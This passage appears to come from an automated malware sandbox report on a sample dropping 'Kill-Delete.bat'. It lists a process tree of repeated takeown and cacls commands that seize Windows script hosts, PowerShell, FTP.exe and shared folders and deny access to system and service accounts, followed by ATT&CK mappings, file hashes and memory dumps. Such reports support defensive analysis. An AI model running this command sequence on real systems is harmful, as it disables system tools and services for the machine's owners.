    PID:3660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2780
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d "network service"
    3⤵
    PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4516
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d system
    3⤵
    PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3048
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:1356
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\FTP.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:408
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
    3⤵
    PID:912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1472
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
    3⤵
    PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5032
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
    3⤵
    PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1280
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
    3⤵
    PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:684
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
    3⤵
    PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2588
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
    3⤵
    PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3768
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d system
    3⤵
    PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1520
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:1344
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\wscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1680
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /g Administrators:f
    3⤵
    PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2216
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Users:r
    3⤵
    PID:1408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1044
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
    3⤵
    PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2052
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d SERVICE
    3⤵
    PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2984
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
    3⤵
    PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3580
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d "network service"
    3⤵
    PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3508
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d system
    3⤵
    PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4576
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4232
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\wscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3272
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
    3⤵
    PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2960
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
    3⤵
    PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4904
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
    3⤵
    PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4092
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
    3⤵
    PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2780
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
    3⤵
    PID:612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4632
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
    3⤵
    PID:3304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3712
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d system
    3⤵
    PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4836
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:2844
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\cscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1512
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /g Administrators:f
    3⤵
    PID:640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4456
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Users:r
    3⤵
    PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3816
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
    3⤵
    PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1508
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d SERVICE
    3⤵
    PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4104
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
    3⤵
    PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3768
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d "network service"
    3⤵
    PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1520
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d system
    3⤵
    PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3308
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:3724
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\cscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2216
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
    3⤵
    PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1044
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
    3⤵
    PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2052
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
    3⤵
    PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2984
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
    3⤵
    PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3580
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
    3⤵
    PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3508
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
    3⤵
    PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2752
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d system
    3⤵
    PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3364
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4660
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5076
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4280
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4316
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4088
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:612
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3304
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:408
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3292
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:3328
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4928
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3980
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4296
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3084
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:2900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3376
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:1300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3768
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1520
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3308
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:4408
- - C:\Windows\system32\takeown.exe
    takeown /f C:\ProgramData /a
    3⤵
    - Modifies file permissions
    PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1408
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /g Administrators:f
    3⤵
    PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4140
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /g Users:r
    3⤵
    PID:1044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4652
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /g Administrators:r
    3⤵
    PID:4708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1576
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d SERVICE
    3⤵
    PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1684
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d mssqlserver
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4936
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d "network service"
    3⤵
    PID:844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:936
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d system
    3⤵
    PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4464
- - C:\Windows\system32\cacls.exe
    cacls C:\ProgramData /e /d mssql$sqlexpress
    3⤵
    PID:5068
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Users\Public /a
    3⤵
    - Modifies file permissions
    PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4648
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /g Administrators:f
    3⤵
    PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2720
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /g Users:r
    3⤵
    PID:2676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4276
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /g Administrators:r
    3⤵
    PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2728
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d SERVICE
    3⤵
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1468
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d mssqlserver
    3⤵
    PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1456
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d "network service"
    3⤵
    PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4508
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d system
    3⤵
    PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1472
- - C:\Windows\system32\cacls.exe
    cacls C:\Users\Public /e /d mssql$sqlexpress
    3⤵
    PID:3952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Kill-Delete.bat

Filesize
10KB

MD5
1726416850d3bba46eeb804fae57083d

SHA1
7e7957d7e7fd7c27b9fb903a0828b09cbb44c196

SHA256
c207a7a561ab726fb272b5abd99c4da8e927b5da788210d5dd186023c2783990

SHA512
7747e5c6bd77a43ee958cb7b533a73757e8bfb7b3706af4eb7ec9a99458720f89cd30bb23b4cb069826dc36a6ce737424ad0007307be67a7391591f6c936df27

Download Submit
memory/3944-39-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-4-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-3-0x00000169B9980000-0x00000169B9BCC000-memory.dmp

Filesize
2.3MB

Download
memory/3944-0-0x000001699F330000-0x000001699F41A000-memory.dmp

Filesize
936KB

Download
memory/3944-5-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-7-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-9-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-11-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-13-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-15-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-37-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-19-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-41-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-23-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-25-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-27-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-29-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-31-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-33-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-35-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-17-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-2-0x00000169B9830000-0x00000169B9840000-memory.dmp

Filesize
64KB

Download
memory/3944-21-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-43-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-45-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-47-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-49-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-51-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-53-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-55-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-57-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-59-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-61-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-63-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-65-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-67-0x00000169B9980000-0x00000169B9BC6000-memory.dmp

Filesize
2.3MB

Download
memory/3944-944-0x00007FF838AE0000-0x00007FF8395A1000-memory.dmp

Filesize
10.8MB

Download
memory/3944-1382-0x00000169B9830000-0x00000169B9840000-memory.dmp

Filesize
64KB

Download
memory/3944-4784-0x00000169A0FB0000-0x00000169A0FB1000-memory.dmp

Filesize
4KB

Download
memory/3944-4785-0x00000169B9CD0000-0x00000169B9D62000-memory.dmp

Filesize
584KB

Download
memory/3944-4786-0x00000169B9D60000-0x00000169B9DAC000-memory.dmp

Filesize
304KB

Download
memory/3944-4790-0x00000169B9F30000-0x00000169B9F84000-memory.dmp

Filesize
336KB

Download
memory/3944-1-0x00007FF838AE0000-0x00007FF8395A1000-memory.dmp

Filesize
10.8MB

Download
memory/3944-4793-0x00007FF838AE0000-0x00007FF8395A1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads